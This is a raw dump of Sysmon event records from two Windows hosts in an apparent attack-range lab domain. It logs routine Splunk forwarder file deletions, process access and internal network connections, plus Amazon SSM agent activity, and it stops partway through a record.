154100x800000000000000080687Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:36.570{2FDD8D40-B15C-615A-2B01-00000000FD01}1412C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000080686Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:36.038{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A118C9E46613FAAD962EEF7F41E263A1,SHA256=1904375D328DD337BA7385760E7DCA4B2FD321221B04277D5F6E97A3A2CB23AD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080685Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:36.022{2FDD8D40-B15B-615A-2A01-00000000FD01}27162868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000102786Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:37.372{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49BAF06B1F159315782D0DFEF6C05B7C,SHA256=6F1140EB47749E50CF229C8D42F2FBA4FD3BFAB455BF4CE6F20696FD2B6FB157,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080702Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:37.038{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5B6654BAC65744FA89957069709568A,SHA256=CEB8DF41B6EF6E2DCD9977F28BD0D4FA2541E70D7BE9DB1AB2208DFFC4DBDCBB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000102785Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:35.355{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49466-false10.0.1.12-8000- 354300x800000000000000080704Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:35.683{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local49976-false10.0.1.12-8000- 23542300x800000000000000080703Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:38.038{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CEBC35A400DE4F8BF15D4D42F391B9EA,SHA256=1400CA0210185982F099A3AAAEB108C464C66F8F2D4E6409D879AF8651BA8C4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102787Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:38.372{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FEBA93D3E347DE88B3FEB9EC9992AD21,SHA256=EB57FA2BC914871DBC5E64D6BE1513B71C9D13EE7BDB71C70AC5DC8FCBDCFBDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080705Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:39.054{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9DBD214CACD586A899556BA3640587F,SHA256=01FD17930229F90D394855BAA9FE17822CB4EDEF4EE6AFA2FB4EFB9690579E01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102788Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:39.372{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72FB84EE3CC59E202D168FF175078507,SHA256=DC92B3E4CFD3A1650CFE1D48ADD190E219133F272506F703106632CFC56B1DE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102789Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:40.372{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC723C5E1986039334DC0E97D9490CAA,SHA256=3C79FAEA64E0E736CD9350B15AABD40E3DFE51C98663CB26F09929332A9311E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080706Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:40.085{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=281E63EE9E8A3998B93FDE8E2E60DFA3,SHA256=5EAF135F32F6557EDD4AAEFE664ED439A346B6C8C20DEE5E583488C61EBA3C02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102792Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:41.403{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7B54B18E1EB057CDC45465A655903761,SHA256=12D4FBF9B7674EFCB8F6E0E08557953404852C2E4D5F045F6B093AC3A16170C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102791Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:41.403{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A1A349657D2B34F081817F8C66445382,SHA256=A77DD7D3087FC59013A76A9EDEFC69BD638B779D6DB147ADA6420D4A9BC130F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102790Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:41.403{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA25E604E138B3BB69B7BD9877845826,SHA256=79D7A77C36327B2BB5355085C1C0B0A513F982144EBAD4EC2072A183AB9DF616,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080707Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:41.085{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCA621B95E0557EC1A0EA916122FDE84,SHA256=09C9941981466008D57112757AC4986D5373711F6AAD31A01E7C129831FC38D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102794Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:42.450{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=746BEB947FBFDF78F87BD8B7FB2A3482,SHA256=C887B3ABAC9B30FC36B5A2005B08BA7AC6738192A273EC2C209D6925CAD43F9D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000080709Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:40.730{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local49977-false10.0.1.12-8000- 23542300x800000000000000080708Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:42.147{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18CEC77D2780926BBC4FB7191ED7AE58,SHA256=6506D39BD23E2E2F7B01EA15C2C0113E4CBF546A2A9C885C6969267C6D63CD47,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000102793Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:40.400{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49467-false10.0.1.12-8000- 23542300x800000000000000080710Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:43.382{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84DF6A0E28D1A49C3C495005657E3524,SHA256=84A395E827D9E83AEBC90AAE871BECF3663E399985526D579E75FC7F40E093F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102795Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:43.450{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5B2BED39EA58C992BDB9BCBBDA8FA3C,SHA256=6877FC06D1187ABCBF509F6BDD074B0404320DB1FECEEBF0444DCD27D89133FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080711Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:44.413{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA8D829A2CCEC425CC7E17B297034F14,SHA256=FE957D6AC373CF44BAA57433108E4C663F968C5FB0988E2E6DA4DD4B591B1899,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102796Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:44.450{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F26C5FD048DDBC83D798738C0311501E,SHA256=F9E3A5C8D4B92EF2A7924A56E078C2BC27154C54664C00F48FD8BD1CBDB229F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080712Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:45.491{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59EFDFB4DD109E7F3D8F7FD8F2E15690,SHA256=B1C40991687E6BD97885D2C7D7D5808EE91897C009DA800BE3397BC8C25DFD3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102797Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:45.450{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E94E9634718C0BDA4B3D91F04E552AB6,SHA256=A3945BBC15378D2A61FFA43B7E54F7C07E73ACF2C7DCF0D5C3B3B27060E7DC92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080713Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:46.507{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B553C182B622DF8885C31D5B26E00F94,SHA256=410F17FC9E9301457034157B027C3AD5CBCBB01E4828F6E582B26C2E78107969,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102798Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:46.450{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F2A3534E758D8FAB92F236A74E2800C,SHA256=17BF458F1250CBE40E08DAD68559EBBEC76CEC966D50F622F8519C4083528C12,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080714Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:47.554{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55E216685F57A0C5095901E60395F2B8,SHA256=324E4031A348447B65D2D366CEDE2E4069A503AB7CFFC756BD060EE1D6A8E5DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102800Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:47.483{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACA2B82BA981D6EE72D893FE7C048F22,SHA256=F9ABF4BA4B7BF406149BFB49E775D465B904E1E454609B567C62B6B2B7A749C2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000102799Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:46.371{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49468-false10.0.1.12-8000- 23542300x800000000000000080715Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:48.554{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=236C69552DBE35C1A249744067BE891F,SHA256=0FBB5088DE2B5DB1E1BE6D73B1ABDD35039DD104349D12E5659F358D0A80174F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102801Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:48.514{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8091D918BFC71CC99E0A39A1FB968E28,SHA256=B0B63F04BE831B25BE83D9B80D3BF9EB9C656FDCA49D40F95F5CFC4B6AA19529,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080717Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:49.554{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED64EC0F9ACF06F3B91D78BC767BBD1F,SHA256=8418609AB75E73643D05A19496F93D108BE3959BC15202F1619A9ADBDA7435DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102802Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:49.545{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B65AE17F5CA448FB501C6DAEF2BD005,SHA256=399308FF3FA9C7DF4589BF896C5AF650656DA1B1F695DAD0C10329B0AD3C273D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000080716Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:46.589{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local49978-false10.0.1.12-8000- 23542300x800000000000000080719Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:50.554{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D01744718328E9D2550631F6778A1BD,SHA256=CE8CDEF424A397D14995CFE06AFC772BB7C8F0A6DE3EA19C114DD2F9B08FA8F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102803Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:50.561{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E65F44D5FBABD921D3C2BED6D2485467,SHA256=3E3BB75EAD0938E69E0CFFF5AD89E5D6F0A115DCA7C82C8BB913FB7B7E102AF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080718Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:50.494{2FDD8D40-AC9A-615A-1C00-00000000FD01}1896NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a5ffc3526a1e15c5\channels\health\respondent-20211004072621-019MD5=CD243B6FFA786E96F03F03FFF6EEA1F9,SHA256=BD72F37F00391F7EDFD796CB74D802386D2E764AAC9DEBCA5D4587784D6F99D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080721Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:51.613{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBF8DE1AAFE052847C96E7F89878103C,SHA256=732BF0BC2E6245DF3019ED4BDC7E1DC8F163060717CC4A7DFA4C4998E63DAE73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102804Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:51.592{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53EEF796AB4A1DC3587933E5D3B5107C,SHA256=CA257487C397BF27E1FF0CE782344628BB5B6594C62F8A431C07657F173A8A7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080720Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:51.492{2FDD8D40-AC9A-615A-1C00-00000000FD01}1896NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a5ffc3526a1e15c5\channels\health\surveyor-20211004072618-020MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080722Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:52.725{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E246AEA6DB63CACCA58D5D8664C6E4B,SHA256=F8348D81DE926D6FE5077ED1BE8474409B06D69EE20909FA63FEF66E77249B86,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102805Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:52.592{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7B788C2737D38C2909E03DC78E15223,SHA256=97F118CD4760F10349F7859B0A81E6DFF6DBA35BDFA65ABD0B169F1F5F36A5CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080723Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:53.772{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=233E23D23A6CD50F70E2BFEFF0F62491,SHA256=D5BFB9B5CBBCCD11540648E651294B0FBA11FF958EEEF50728735599AB765BA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102808Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:53.592{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9E355F87ECE11968257CB2AE2719F7C,SHA256=1579E58E2ACFB6F145A8D479161F38C8592FBDCD9904708B65DA95B0FA00FB82,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000102807Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:53.389{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-AE66-615A-BF00-00000000FC01}4620C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000102806Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:51.371{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49469-false10.0.1.12-8000- 23542300x800000000000000080724Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:54.788{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF103102A699FB69E879DDAC8604E39D,SHA256=B52C1BDD4BEFC02044973CAC97E4567128931763AF582715A8195B54B04F202F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102809Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:54.592{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 